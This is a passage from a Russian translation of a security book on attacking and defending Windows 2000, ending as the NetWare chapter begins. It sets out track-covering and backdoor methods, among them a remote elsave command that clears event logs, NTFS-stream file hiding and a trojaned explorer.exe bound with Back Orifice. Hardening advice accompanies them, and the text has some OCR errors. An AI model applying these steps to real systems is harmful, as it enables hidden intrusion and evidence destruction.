    Однако в рамках этой модели члены новых универсальных групп (например, группы администраторов предприятия Enterprise Admins) и в меньшей степени глобальных групп домена (например, Domain Admins) вступают в доверительные отношения со всеми доменами леса. Поэтому взлом учетной записи члена одной из таких групп обеспечивает хакеру доступ ко всем доменам леса. Поэтому авторы советуют организовывать не вполне доверенные сущности (например, подсети организаций-партнеров) или объекты, подверженные угрозам извне (например, центр данных Internet) в отдельный лес или реализовывать их как отдельные серверы.
    Кроме того, при двухсторонних транзитивных доверительных отношениях группа Authenticated Users приобретает совсем другой смысл. В больших организациях не имеет смысла рассматривать эту группу как доверенную.


    16. Сокрытие следов



    Сокрытие следов


    В Win 2000 применяются в основном те же средства и приемы сокрытия следов, что и в более ранних версиях операционной системы с небольшими отличиями. Приведем их краткое описание.


    17. Отключение аудита



    Отключение аудита


    Для включения аудита можно воспользоваться аплетом Local Security Policy (secpol.msc) или Group Policy (gpedit.msc), выбрав на левой панели управляющей консоли элемент Local Policy^Audit Policy или Computer Configuration>Windows SettingsoSecurity Settings>Local Policy>Audit Policy соответственно. Политика групп будет рассмотрена ниже в этой главе. Параметры аудита в Win 2000 в основном совпадают с параметрами NT 4.
    В настоящее время никакой централизации ведения журналов регистрации в Win 2000 не планируется — все журналы по-прежнему хранятся на локальных машинах, что является слабым местом по сравнению с системой регистрации syslog в UNIX. И конечно же. Windows 2000 по-прежнему отказывается записывать IP-адрес удаленного соединения для подозрительных событий типа неудачной регистрации. Некоторые вещи никогда не изменятся.
    Для включения и отключения аудита можно использовать также утилиту auditpol из набора средств NTRK. Эта утилита работает точно так же, как описано в главе 5, если не учитывать интерфейс настройки аудита политики групп. Что бы мы делали без NTRK?


    18. Очистка журнала регистрации событий



    Очистка журнала регистрации событий


    В Win 2000 по-прежнему возможна очистка журнала регистрации событий, однако доступ к журналам осуществляется посредством нового интерфейса. Просмотреть различные журналы событий теперь можно через управляющую консоль Computer Management с помощью элемента System ToolsЮ Event Viewer. Появилось три новых журнала: Directory Service, DNS Server и File Replication Service. При щелчке правой кнопкой на одном из них открывается контекстное меню, содержащее команду Clear All Events.
    Утилита elsave, описанная в главе 5, позволяет очистить все журналы (включая и новые) в удаленном режиме. Например, следующая команда приводит к очистке журнала службы репликации файлов File Replication Service на удаленном сервере joel (для удаленного выполнения этой операции требуются соответствующие привилегии).
    С:\> elsave -s \\joel -1 "File Replication Service" -С
     


    19. Скрытие файлов



    Сокрытие файлов


    Одной из главных задач хакера после удачного вторжения в систему является надежное сокрытие своего инструментария. В главе 5 обсуждались два способа сокрытия файлов: с помощью команды attrib и файловых потоков.

    Команда attrib



    Для сокрытия файлов по-прежнему можно применять команду attrib, но при этом файлы все же останутся видимыми при выборе опции Show All Files для данной папки.

    Потоки



    С помощью утилиты ср из набора NTRK (поддерживающей стандарт POSIX) можно скрыть файлы за другими файлами в потоках (см. главу 5). Эту утилиту можно использовать и в Win 2000 даже при переходе на новую версию 5 файловой системы NTFS.
    Для выявления файловых потоков можно использовать утилиту sfind от компании NTObjectives. Она вошла в состав пакета Forensic Toolkit, доступного по адресу http://www.ntobjectives.com.


    20. Потайные ходы



    Потайные ходы


    Последним пунктом программы хакеров является обеспечение возможности повторного проникновения в систему, усыпив бдительность системных администраторов.


    21. Манипуляции в процессе запуска системы



    Манипуляции в процессе запуска системы


    Как упоминалось в главе 5, излюбленный прием хакеров — оставить в системе свои исполняемые файлы, которые будут автоматически запускаться при загрузке системы. Такие возможности по-прежнему имеются в системе Win 2000. Поэтому необходимо проверять соответствующие папки взломанной системы на наличие неизвестных или странных команд.
    Параметры запуска системы задаются в системном реестре в следующих подразделах раздела HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion:

    •  ...\Run
    •  ...\RunOnce
    •  ...\RunOnceEx
    •  ...\RunServices

    В Win 2000 отличается лишь местоположение папки автозагрузки Startup для каждого пользователя. Теперь эта папка находится в папке Documents and Settings (%systemdrive%\ Documents and Settings\%user%\Start Menu\Programs\Startup).

    Прикрепление к исполняемым файлам



    Иногда наиболее очевидные потайные ходы сложнее всего разглядеть. Например, можно просто разместить троянскую оболочку Windows под именем explorer.exe в корне каталога %systemdrive% целевой системы (по умолчанию право записи в этот каталог имеют все пользователи). Тогда при интерактивной регистрации пользователя эта профамма по умолчанию будет использоваться в качестве оболочки для этого пользователя. Почему это происходит?
    В документации к набору средств разработки программных продуктов (SDK — Software Development Kit) компании Microsoft ясно сказано, что если имя исполняемого файла или динамической библиотеки DLL указано в реестре без задания пути к этому файлу, то операционная система Windows NT/2000 выполняет поиск этого файла в следующей последовательности.
    1. В каталоге, из которого загружено приложение.
    2. В текущем каталоге родительского процесса.
    3. В системном каталоге %windir%\System32.
    4. В системном каталоге %windir%\System.
    5. В каталоге Windows %windir%.
    6. В каталогах, определяемых значением переменной окружения PATH.
    Потенциальная опасность такого поведения проявляется при использовании предлагаемой по умолчанию оболочки NT/2000, задаваемой ключом реестра нкъм\SOFTWARE\-Microsoft\WindowsNT\CurrentVersion\Winlogon\Shell. По умолчанию этому ключу соответствует значение explorer.exe без явного указания пути к этому файлу. Следовательно, если некто в процессе загрузки скопирует модифицированную оболочку с именем explorer. ехе в корневой каталог системного диска (например, диска С: \), то она и будет использована для данного сеанса пользователя по умолчанию, поскольку поиск файла оболочки будет выполняться в корневом каталоге (текущим каталогом в процессе загрузки системы считается %systemdrive%).
    По словам Альберто Арагонеса (Alberto Aragones) (http://www.quimeras.com/ecadv/ntpath.htm), для демонстрации этого эффекта достаточно скопировать командную оболочку NT/2000 cmd.exe в корневой каталог системного раздела, завершить сеанс, а затем зарегистрироваться снова. Тогда вместо стандартной оболочки Windows будет использоваться командная оболочка.
    Рассмотрим последствия этой ситуации. Как будет описано в главе 14, существуют средства (типа eLiTeWrap), с помощью которых можно легко объединить несколько программ с целью их незаметного и асинхронного выполнения. Иными словами, программу типа Back Orifice 2000 можно связать с копией explorer.exe, поместить этот пакет в корневой каталог системного диска, и эта хакерская программа будет незаметно запускаться при каждой следующей интерактивной регистрации. При этом Explorer будет работать как ни в чем не бывало. Жуть...
    Альберто на своем Web-узле приводит остроумный способ реализации такого подхода с удаленного компьютера, основанный на использовании службы telnet для NT/2000, работающей на целевом компьютере. Для этого нужно подключиться к службе telnet на целевом компьютере, затем загрузить на этот компьютер "запасной вариант" explorer. ехе (например, через службу FTP в режиме командной строки), и, наконец, из командной строки telnet переписать его в каталог %windir%, запустить настоящий explorer.exe и завершить сеанс telnet. После этого в каждом интерактивном сеансе вместо реального проводника будет использоваться "подставной вариант" explorer. ехе.
    Этот же прием применим для подмены динамических библиотек. Информация об именах динамических библиотек хранится в соответствующих исполняемых файлах Windows. Поиск указанных библиотек выполняется в том же приведенном выше порядке. Такая последовательность поиска может вызвать схожие проблемы с подменой библиотек DDL.

    Выявление всех относительных путей в реестре



    Эта проблема была устранена в модуле обновления MS00-052, не включенном в состав сервисного пакета SP1, поэтому этот модуль необходимо применять независимо от установки сервисного пакета. И хотя в разделе часто задаваемых вопросов компания Microsoft заявляет об отсутствии этой угрозы (http://www.microsoft.com/technet/ security/bulletin/fq00-052.asp), Альберто Арагонес (Alberto Aragones) приводит примеры других исполняемых файлов (например, rundll32.exe), для которых пути в реестре явно не указаны. Действительно, имя этого файла многократно встречается в реестре без указания абсолютного пути.
    Один из способов решения проблемы состоит в выявлении всех переменных в реестре, для которых не заданы абсолютные пути, и добавлении таких путей вручную. Однако эта процедура может оказаться слишком длительной.
    Возможно более эффективным решением яштяется ограничение возможности интерактивной регистрации на сервере (правда, это несколько осложняется появлением терминального сервера). И, конечно же, необходимо установить указанный выше модуль обновления. Этот модуль устраняет угрозу за счет добавления префикса %systemroot% к имени оболочки.

    Возникает вопрос, как вернуть систему в нормальное состояние, если с ней уже сыграли злую шутку, описанную Альберто? На этот случай Альберто советует запустить программу %windir%\explorer.exe из командной оболочки, а затем удалить "поддельный" проводник, или просто ввести команду геп\ explorer.exe harmless.txt, а затем перезагрузить компьютер с помощью комбинации клавиш <Alt+Ctrl+Del>.


    22. Удаленное управление



    Удаленное управление


    Все описанные в главе 5 механизмы удаленного управления по-прежнему работают в новой версии операционной системы. Утилита remote из набора NTRK теперь входит в состав средств поддержки Win 2000 Support Tools (как и многие другие базовые утилиты NTRK). Обновленная версия этой утилиты называется wsremote, но ее функциональность в целом сохранилась. Средства NetBus и WinVNC не претерпели никаких изменений. В Win 2000 может работать и утилита Back Orifice 2000 (ВО2К), поэтому особо беспечным администраторам, которые потешались над возможностью работы исходной версии ВО только в среде Win 9.v, теперь будет не до шуток.

    Терминальный сервер



    Значительным новшеством Win 2000 является включение терминальных служб в состав базовых серверных продуктов. Дополнительно устанавливаемый терминальный сервер превращает Win 2000 в абсолютно новую систему, позволяющую выполнять клиентские процессы на центральном процессоре сервера. Во всех предыдущих версиях Windows, за исключением отдельного продукта NT Terminal Server Edition, все клиентские программы всегда выполнялись процессором клиента. Для пользователей операционной системы UNIX и больших машин такой подход не нов, однако администраторам NT/2000, безусловно, понадобится некоторое время, чтобы научиться отличать удаленные интерактивные сеансы от сеансов работы в режиме консоли.
    Из предыдущего раздела, посвященного сканированию, ясно, что верным признаком терминального сервера является открытый TCP-порт 3389. При его выяштении хакеры наверняка постараются воспользоваться клиентом терминальной службы (тем более, что его установочный комплект занимает две дискеты и находится в каталоге %windir%\ system32\clients сервера Win 2000) и предпринять атаку, направленную на взлом пароля учетной записи администратора. Если эта учетная запись является интерактивной, то взломщики беспрепятственно продолжат атаковать контроллер домена Win 2000, даже если включен режим блокировки пароля passprop /adminlockout (более подробная информация об этом содержится в главе 5). Однако процесс подключения клиента терминальной службы после пяти неудачных попыток прекращается, поэтому для взлома пароля потребуется немало времени.

    Выявление отключенных соединений  с терминальным сервером



    Что может сделать взломщик, имея привилегии администратора на терминальном сервере? Если на момент подключения хакера с данными учетной записи Administrator последний представитель из группы администраторов забыл завершить терминальный сеанс (или несколько сеансов), то взломщик получит следующее информационное сообщение.


    Выбрав один из открытых сеансов, хакер может получить доступ к конфиденциальным документам или другим секретным данным, а также автоматически получить доступ к работающим приложениям, которые в другое время ему пришлось бы запускать вручную.

    Завершение терминальных сеансов



    Если просто закрыть окно клиента терминального сеанса или щелкнуть на кнопке Disconnect, сеанс останется активным. Для завершения терминального сеанса необходимо выбрать соответствующую опцию при выполнении команды Start^Shutdown или воспользоваться комбинацией клавиш <Ctrl+Alt+End> в режиме работы клиента терминального сервера. Приведем список других клавиатурных эквивалентов команд, доступных в режиме работы клиента терминального сервера.
    <Ctrl+Alt+End> Открывает диалоговое окно безопасности Windows
    <Alt+Page Up> Позволяет переключаться между программами слева направо
    <Alt+Page Down> Позволяет переключаться между программами справа налево
    <Alt+Ins> Позволяет переключаться между программами в порядке их запуска
    <Alt+Home> Отображает меню Start
    <Ctrl+Alt+Break> Выполняет переключение между оконным и полноэкранным режимом
    <Alt+Del> Отображает всплывающее меню данного окна
    <Ctrl+Alt+MHHyc(-)> Помещает копию активного окна на компьютере клиента в буфер обмена терминального сервера (выполняет ту же функцию, что и <Alt+Print Screen> на локальном компьютере). Для выполнения этой операции используется клавиша <-> на цифровой клавиатуре <Ctrl+Alt+ruiK>c(+)> Помещает копию всей области экрана компьютера клиента в буфер обмена терминального сервера (выполняет ту же функцию, что и < Print Screen> на локальном компьютере). Для выполнения этой операции используется клавиша <+> на цифровой клавиатуре.

    Во время подготовки этой книги к печати по адресу http://marvin.criad vcmtage.com/caspian/Software/SSHD-NT/default.php ПОЯВИЛСЯ набор бесплатных утилит Linux для DOS SSHD-NT. Утилиты SSH (Secure Shell) в течение многих лет обеспечивают безопасность удаленного управления UNIX-системами, поэтому на них возлагаются большие надежды и в области удаленного управления Win 2000. Предполагается, что набор SSHD-NT составит достойную альтернативу терминальному серверу в смысле безопасного удаленного управления из командной строки. Более подробная информация по SSH содержится в разделе часто задаваемых вопросов по Secure Shell по адресу http://www.employees.org/~satch/ssh/faq/ssh-faq.html.


    6.gif

    Изображение: 

    23. Регистраторы нажатия клавиш



    Регистраторы нажатия клавиш


    В Win 2000 по-прежнему хорошо работают программы, регистрирующие нажатия клавиш, NetBus и Invisible Key Logger Stealth (IKS), описанные в главе 5.


    24. Контрмеры общего назначения: новые средства обеспечения безопасности Windows



    Контрмеры общего назначения: новые средства обеспечения безопасности Windows


    В Win 2000 включены новые средства обеспечения безопасности. Теперь этот аспект гораздо лучше систематизирован, чем в NT 4. Эти утилиты позволяют жестко настроить защиту системы во имя избежания возможных брешей в защите.


    25. Политика групп



    Политика групп


    Одним из наиболее мощных новых средств в Win 2000 является политика групп, которая уже несколько раз упоминалась в этой главе. Объекты политики групп могут храниться как в активном каталоге, так и на локальной машине, и определять параметры конфигурации в масштабах домена или одного компьютера соответственно. Политику групп можно применять к узлам, доменам или организационным единицам. Параметры политики наследуются пользователями или компьютерами, входящим в состав этих единиц ("участниками" группы).
    Объекты политики групп можно просматривать и редактировать в любом окне управляющей консоли при наличии привилегий администратора. В комплект поставки Win 2000 входят следующие объекты политики групп: Local Computer, Default Domain и Default Domain Controller. При запуске программы gpedit.msc из меню Start вызывается объект политики групп локального компьютера. Объекты политики групп можно также просмотреть во вкладке Group Policy окна свойств каждого объекта активного каталога (домена, организационной единицы или узла). Там отражена конкретная политика, применяемая к выбранному объекту (типы политики перечислены в соответствии с приоритетом), а также указано, где блокируется наследование объектов политики. Здесь же можно редактировать объекты политики групп.
    Благодаря возможности редактирования политики можно обеспечить множество безопасных конфигураций для объектов каталога. Значительный интерес представляет подраздел Security Options раздела Computer Configurations-Windows Settings>Security Settings>Local Policies. В нем содержится более 30 различных параметров конфигурации, обеспечивающих безопасность любого компьютерного объекта, к которому применяется данная политика. В число этих опций входят режим ограничения анонимных соединений Additional Restrictions For Anonymous Connections (параметр системного реестра RestrictAnonymous), параметр уровня аутентификации LanManager, и опция переименования учетной записи администратора.
    В разделе Security Settings можно также выбрать политику для учетных записей, политику аудита, параметры журнала регистрации событий, открытый ключ и настроить политику IPSec. Благодаря возможности настройки этих политик на уровне узла, домена и организационной единицы задача обеспечения безопасности в больших сетях значительно упрощается. Предлагаемая по умолчанию политика групп на уровне домена показана на рис. 6.2.


    Объекты политики групп обеспечивают один из способов защиты больших доменов Win 2000. Однако зачастую политика уровня домена может входить в противоречие с локальной политикой. Кроме того, губительный результат может иметь задержка, возникающая до вступления в силу политики групп. Такую задержку можно устранить, например, с помощью утилиты secedit (эта утилита более подробно обсуждается в следующем разделе), выполняющей немедленное обновление политики. Для обновления политики с помощью утилиты secedit откройте диалоговое окно Run и введите команду secedit /refreshpolicy MACHINE_POLICY
    Для обновления политики, заданной в разделе User Configuration, введите secedit /refreshpolicy USER_POLICY



    Рис. 6.2. Объект политики групп Default Domain Policy

    Средства настройки безопасности



    Для настройки политики групп можно воспользоваться набором утилит для настройки безопасности, в состав которого входят две программы: Security Configuration and Analysis и Security Templates.
    Программа Security Configuration and Analysis позволяет администраторам выполнять проверку соответствия конфигурации локальных систем определенному шаблону и изменять любые несовместимые параметры. Эта программа встроена в управляющую консоль, а также существует в виде утилиты командной строки secedic. Это довольно мощный механизм для быстрой проверки безопасности системы. К сожалению, эта утилита позволяет анализировать только локальную систему и не работает в масштабе домена. Ее можно использовать в командном файле сценария регистрации и распространить таким образом ее действие на удаленные системы, однако она не так удобна для распределенной среды, как средство Group Policy.
    К счастью, шаблоны защиты можно импортировать в программу Group Policy, обеспечив передачу шаблона каждому домену, узлу или организационной единице, к которым применяется политика групп. Чтобы импортировать шаблон защиты в утилиту Group Policy, щелкните правой кнопкой на элементе Computer ConfigurationWVindows Settings\Security Settings и выберите из контекстного меню команду Import. По умолчанию импортирование выполняется из каталога %windir%\ securityXtemplates, где хранится 11 стандартных шаблонов.
    Фактически эти 11 шаблонов и составляют средство Security Templates. Файлы шаблонов соответствуют различным уровням безопасности, которые могут использоваться совместно со средством Security Configuration and Analysis. Хотя многие параметры этих шаблонов не определены, они являются хорошей отправной точкой при разработке шаблона для конфигурирования и анализа системы. Эти файлы можно просмотреть с помощью управляющей консоли Security Templates или вручную сконфигурировать в любом текстовом редакторе (напомним, что файлы шаблонов имеют расширение . inf и расположены в каталоге %windir%\security\templates\).

    Команда runas



    К радости поклонников операционной системы UNIX в состав Win 2000 включена собственная команда переключения привилегий пользователей runas (аналог su).
    В соответствии с требованиями безопасности для выполнения задач пользователю желательно предоставлять минимально необходимые для этого привилегии. Исполняемые файлы, почтовые сообщения и удаленные Web-узлы, посещаемые через броузер, могут запускать команды с привилегиями текущего пользователя. Значит, чем выше привилегии этого пользователя, тем вероятнее опасность таких операций.
    Многие из опасных атак могут происходить в процессе выполнения повседневных операций. Об этом особенно нужно помнить тем пользователям, которым для выполнения части задач приходится использовать привилегии администратора (к числу таких задач относятся добавление рабочей станции к домену, управление пользователями, аппаратными средствами и т.д.). Положа руку на сердце, можно сказать, что администраторы никогда не регистрируются как обычные пользователи, как того требуют правила безопасности. Это особенно опасно в современном мире тотального подключения к Internet. Если пользователь с правами администратора посетит хакер-ский Web-узел или прочтет сообщение в формате HTML с внедренным активным содержимым (см. главу 16), то он нанесет своей системе гораздо больше вреда, чем допустивший эту же ошибку обычный пользователь Вася Иванов.
    Команда runas позволяет любому пользователю зарегистрироваться в системе с более низкими привилегиями и получать права администратора для выполнения конкретных задач. Например, предположим Вася Иванов зарегистрировался на контроллере домена через терминальный сервер как обычный пользователь, а затем ему срочно потребовалось изменить пароль одного из администраторов домена (скажем, потому, что этого администратора только что уволили и он в ярости грозится напомнить о себе). К сожалению, зарегистрировавшись как обычный пользователь, Вася не сможет даже запустить службу Active Directory Users and Computers, а не только изменить пароль администратора. Для этого Васе придется выполнить следующие действия.
    1. Выбрать команду Start>Run и ввести 
    runas /user:mydomain\Administrator "mmc %windir%\system32\dsa.msc"
    2. Ввести пароль администратора.
    3. После запуска службы Active Directory Users and Computers (файл dsa.mmc) с привилегиями администратора домена изменить пароль администратора.
    4. Затем он завершит сеанс службы Active Directory Users and Computers и продолжит работу как обычный пользователь.
    Таким образом, Вася избавит себя от необходимости завершения сеанса терминального сервера, регистрации с правами администратора и повторной перерегистрации с привилегиями обычного пользователя. Основным правилом должно стать использование минимального уровня привилегий.
    Более наглядный пример осторожного использования утилиты runas — понижение привилегий для запуска Web-броузера или чтения почты. В конце марта 2000 года состоялась интересная дискуссия (http://www.ntbugtraq.com) о том, какие привилегии должны использоваться при вызове некоторого адреса URL в окне броузера, если в системе открыто несколько окон, в том числе некоторые с привилегиями администратора runas /u:Administrator. Один из подходов сводился к тому, чтобы ярлык броузера поместить в группу автозагрузки Startup и всегда запускать его с минимальными привилегиями. Последняя точка в этом споре относительно целесообразности использования runas так и не была поставлена. Дело в том, что приложения, запускаемые в рамках динамического обмена данными DDE, типа IE, информацию о ключах защиты получают из порождающего их процесса. Следовательно, runas никогда не создает процессы IE, необходимые для обработки гиперссылок, внедренных документов и т.д. Создание порождающего процесса зависит от программы, поэтому очень сложно определить реального владельца этого процесса. Возможно, компания Microsoft когда-нибудь разъяснит, действительно ли runas обеспечивает большую безопасность, чем полное завершение работы всех программ, требующих привилегий администратора, перед использованием броузера.
    Утилита runas — не панацея. По словам Джеффа Шмидта (Jeff Schmidt), устраняя некоторые угрозы, она открывает возможности для других. Поэтому ее следует использовать с осторожностью.

    Команда Run as теперь доступна через контекстное меню.
    Для ее запуска нужно щелкнуть правой кнопкой
    мыши на имени файла в окне проводника
    Win 2000 при нажатой клавише <Shift>.


    7.gif

    Изображение: 

    8.gif

    Изображение: 

    26. Резюме



    Резюме


    В этой главе мы лишь слегка коснулись многочисленных изменений, относящихся к Win 2000, однако проверка программ взлома для NT 4 показала существенное повышение безопасности в новой версии операционной системы. Вселяет оптимизм также добавление распределенной политики безопасности в Win 2000. Однако окончательные выводы о защищенности этой операционной системы можно будет сделать только в процессе ее широкого использования. Для полного выявления всех брешей системы NT 4 понадобилось несколько лет. Примерно столько же времени потребуется и для досконального изучения Win 2000. Приведем несколько советов, основанных на материале этой главы, главы 5, а также материалах многочисленных ресурсов Internet по безопасности Win 2000.

    •  Изучите резюме к главе 5, где приводится перечень мер по защите NT. Практически все эти советы применимы и к Win 2000. (Местоположение некоторых параметров изменилось. Некоторые из них нашли отражение в интерфейсе пользователя, в частности объект политики групп Computer Configuration Windows Settings\Security Settings\Local Policies\Security Options).
    •  Воспользуйтесь рекомендациями по обеспечению безопасности IIS5, приведенными по адресу http://www.microsoft.com
      /security
      . Загрузите также средство конфигурирования IIS5, обеспечивающее возможность настройки пользовательских шаблонов.
    •  Информация по защите SQL Server 7.0 для Win 2000 содержится по адресу http://www.microsoft.com/
      technet/SQL/Technote/secure.asp
      .
    •  Помните, что атаки, как правило, не совершаются на системном уровне. Чаще различным угрозам подвержен уровень приложений, особенно это касается современных приложений на основе Web-технологий. На основе приведенной в этой главе информации необходимо, конечно, защитить уровень операционной системы, но основные усилия следует сосредоточить на защите уровня приложений.
    •  Может это покажется смешным, но удостоверьтесь в корректности версии Win 2000. Продукты Win 2000 Server и Advanced Server задействуют множество служб (особенно в качестве контроллеров домена для службы Active Directory), поэтому их необходимо ограждать от недоверенных сетей, пользователей и других ненадежных объектов.
    •  Для обеспечения хорошей зашиты применяйте принцип минимализма: если нечего атаковать, то атака невозможна. Отключите все необязательные службы (с помощью services .msc). Обеспечьте необходимую безопасность для оставшихся обязательных служб. Например, настройте службу DNS таким образом, чтобы ограничить возможности переноса зоны.
    •  Если службы файлов и печати необязательны, запустите аплет Network and Dial-up Connections, а затем выберите команду Advanced => Advanced Settings и сбросьте флажок File And Printer Sharing for Microsoft Networks для каждого адаптера, чтобы отключить использование протокола NetBIOS поверх TCP/IP, как показано на рис. 6.1 в начале этой главы. Это наилучший способ настройки внешних интерфейсов подключенного к Internet сервера.
    •  Используйте фильтры TCP/IP и IPSec (описанные в этой главе) для блокировки доступа к прослушиваемым портам, за исключением минимально необходимого набора открытых портов.
    •  Защитите серверы, имеющие выход в Internet, с помощью брандмауэра или маршрутизатора, чтобы ограничить DoS-атаки. Кроме того, с помощью описанных в этой главе методов защититесь от стандартных DoS-атак.
    •  Регулярно устанавливайте сервисные пакеты и модули обновления. Расширяющийся с каждым днем список этих средств можно найти по адресу http://www.microsoft.сот/security.
    •  Ограничьте привилегии интерактивных учетных записей, чтобы в зародыше предотвратить атаки, направленные на расширение привилегий.
    •  По возможности завершайте терминальные сеансы, а не просто отключайтесь от терминального сервера и не оставляйте открытых сеансов на "растерзание" взломщикам, получившим права администратора.
    •  Используйте новые средства типа Group Policy (gpedit.msc) и Security Configuration and Analysis с дополнительными шаблонами для реализации распределенной схемы защиты среды Win 2000.
    •  Придерживайтесь строгих правил физической защиты от атак в автономном режиме против файла SAM и средства EFS, описанных в этой главе. Храните системный ключ на гибком носителе или защищайте его паролем. Обеспечьте физическую защищенность жизненно важных серверов, установите для них пароли на BIOS и отключите дисководы для съемных носителей, которые можно использовать для загрузки в систему с помощью альтернативной операционной системы.
    •  Воспользуйтесь информацией из справочной системы по рациональному использованию шифрования файловой системы. Реализуйте шифрование на уровне каталогов для максимального числа пользователей, особенно для пользователей переносных компьютеров. Не забудьте экспортировать ключ агента восстановления, а затем удалить его с локальной машины, чтобы не подвергать зашифрованные файлы атакам в автономном режиме.
    •  Подпишитесь на бюллетень NTBugtraq (http://www.ntbugtraq.com), чтобы быть в курсе обсуждения последних новостей, касающихся безопасности NT/2000. Если объем информации в этом бюллетене для вас слишком велик, подпишитесь на дайджест, чтобы получать все важнейшие сообщения за данный период. Для подписки на дайджест нужно отправить по адресу listserv@listserv.ntbugtraq.com сообщение следующего содержания "set NTSecurity digest" (тему сообщения задавать не надо).
    •  Бюллетень Win2KsecAdvice по адресу http://www.ntsecurity.net во многом дублирует NTBugtraq, но может содержать и новую информацию. Для него тоже существует компактный вариант дайджеста.


    Глава 7. Уязвимость Novell NetWare



    Глава 7. УЯЗВИМОСТЬ NOVELL NETWARE




    1. Уязвимость Novel Netware



    Уязвимость NOVELL NETWARE


    Стандартным заблуждением относительно компании Novell является то, что ее программные продукты несколько устарели и утратили актуальность (по крайней мере в этом нас стараются убедить сообщества Microsoft и UNIX). Несмотря на отсутствие настойчивой рекламы, а также на то, что в последние годы рынок программного обеспечения компании Novell не расширялся, до ее забвения все же еще очень далеко. Во всем мире имеется более сорока миллионов пользователей NetWare, и риск потери важных корпоративных данных чрезвычайно высок. В этой книге будут рассматриваться различные версии NetWare, однако основное внимание мы уделим системе NetWare 4.x с клиентом Client32 — наиболее популярной в настоящее время. Однако если вы приобрели NetWare 5, не расслабляйтесь: многие из описываемых в данной главе атак, а также контрмеры против них по-прежнему актуальны.
    Более семнадцати лет на серверах Novell хранятся наиболее важные и конфиденциальные корпоративные данные — платежные ведомости, контракты, информация о трудовых ресурсах, отчеты о финансовой деятельности и многое другое. Просто поразительно, сколько компаний не могут (или не хотят) отказаться от системы NetWare и оставляют тем самым свои сети незащищенными и лишенными требуемого уровня обслуживания.
    Однако почему система NetWare является незащищенной? У компании Novell было более 16 лет для обеспечения защиты своих программных продуктов. Почему же мы вынуждены снова беспокоиться об этом? Ответ на этот вопрос можно получить у Novell, а не у экспертов по вопросам безопасности. Естественно, систему NetWare можно сделать очень защищенной, однако с применением дополнительных средств. Сама система далека от совершенства. В NetWare 4.x имеются лишь ограниченные средства обеспечения безопасности. Например, по умолчанию любой пользователь может просматривать дерево NDS (Novell Directory Service). При этом не требуется никакой аутентификации. Что еще более примечательно, пользователям Novell не обязательно иметь пароль. Кроме того, при создании учетной записи администраторы не обязаны задавать пароль.
    Если фраза "хакинг NetWare" звучит слишком просто, чтобы оказаться правдой, попробуйте это осуществить самостоятельно. Большинство администраторов NetWare не понимают последствий установки сервера с параметрами, заданными по умолчанию, и, как следствие, совершенно не заботятся о его защите. Почти наверняка вы будете очень удивлены после того, как поэкспериментируете с сервером NetWare, проверяя его готовность к отражению потенциальных атак.
    В главе 3 вы узнали, каким образом взломщики могут получить информацию о сети, что впоследствии позволит им подключиться к компьютеру с системой NetWare. В данной главе будут рассмотрены последующие два шага, которые может предпринять взломщик, чтобы получить на сервере Novell привилегии администратора и в конечном итоге — доступ к дереву NDS. Пример, рассматриваемый на протяжении этой главы, является абсолютно стандартным. Успешность большинства атак, описываемых в этой главе, зависит от наличия в системе NetWare контекста связки (bindery context), который по умолчанию имеется на всех серверах NetWare 4.x, однако на некоторых из них может отсутствовать.


    2. Соединение без регистрации



    Соединение без регистрации


    Первым шагом взломщика является создание анонимного соединения (attachment) с сервером Novell. Для того чтобы разобраться с понятием "соединения", нужно понять, что происходит в процессе регистрации NetWare. Процесс регистрации на сервере NetWare реализован компанией Novell следующим образом. До аутентификации сервером к нему необходимо сначала присоединиться. Соединение и регистрация не являются взаимозаменяемыми. Другими словами, если регистрация завершилась неудачно, то соединение будет сохранено. Так что для соединения нет необходимости использовать корректное имя пользователя и пароль. Как вы скоро узнаете, присоединившись к компьютеру с системой NetWare, взломщик может сразу же приступать к своему черному делу.
    В главе 3 вы узнали, как просмотреть список компьютеров сети и, в частности, все серверы NetWare и имеющиеся деревья NDS. Теперь все, что нужно, сделать, — это присоединиться к серверу. Для этого можно воспользоваться различными способами. Здесь будут рассмотрены три основных средства из этой категории: утилита On-Site Admin от компании Novell, snlist и nslist.

    On-Site Admin



    В набор средств обеспечения безопасности администратор должен включить утилиту On-Site Admin. Она представляет собой средство администрирования NetWare с графическим интерфейсом, разработанное компанией Novell. Утилита On-Site Admin предоставляет информацию о серверах и деревьях, а также практически исчерпывающие данные, позволяющие оценить состояние системы защиты. При разработке этого приложения разработчики Novell приняли разумное решение, однако его можно использовать и против вас. Достаточно забавно, что теперь приложение On-Site Admin является одним из основных средств хакинга Novell.
    При загрузке приложение On-Site Admin отображает все серверы NetWare, перечень которых был получен в результате просмотра сетевого окружения (см. главу 3). После отображения списка серверов в диалоговом окне On-Site Admin просто щелкните на имени требуемого сервера с помощью мыши. При этом автоматически будет создано соединение с сервером. Это можно проверить с помощью программы управления службами Novell NetWare Services, выбрав команду NetWare Connections. Присоединяясь к каждому из интересующих вас серверов, можно приступить к их изучению.

    snlist и nslist



    Утилиты snlist и nslist позволяют создать соединение с сервером точно так же, как и приложение On-Site Admin, только из командной строки. Утилита snlist работает быстрее nslist и хорошо подходит для наших целей, однако nslist оказывается не менее полезной, поскольку позволяет получить полный адрес сервера. Обе программы можно использовать без параметров, чтобы присоединиться ко всем серверам локальной сети. Такой способ соединения создает предпосылки для того, чтобы в полной мере "вкусить прелести" хакинга.

    Если у вас возникли проблемы соединения с серверами Novell, проверьте наличие основного сервера. Для этого откройте диалоговое окно NetWare Connections и убедитесь в том, что в нем имеется сервер, перед именем которого указан символ *. Перед выполнением этих операций необходимо, чтобы существовал как минимум один присоединенный сервер. Если после этого проблема не исчезла, выделите другой сервер и щелкните на кнопке Set Primary. При использовании утилит командной строки необходимо запустить новый сеанс командной строки (cmd.exe для NT или command. com для Win 9x). В противном случае возникнет много ошибок и потребуется потратить много времени на их устранение.

    Контрмеры против соединения



    Нам неизвестно ни одного механизма, с помощью которого можно отключить возможность соединения с сервером NetWare. В настоящее время этот вопрос остается нерешенным, в том числе и в NetWare 5.


    3. Инвентаризация связки и деревьев



    Инвентаризация связки и деревьев


    В состоянии "зомби", когда установлено соединение без регистрации, можно получить огромное количество информации, гораздо больше, чем можно себе представить. Такие средства, как userinfo, userdump, finger, bindery, bindin, nlist и сх, позволяют получить данные о связке. Приложения, подобные On-Site Admin, предоставляют информацию о дереве NDS. Все вместе эти утилиты обеспечивают взломщика большими знаниями, которые позволят ему получить доступ к серверам. Помните о том, что вся необходимая информация доступна через единственное соединение с сервером Novell.

    userinfo



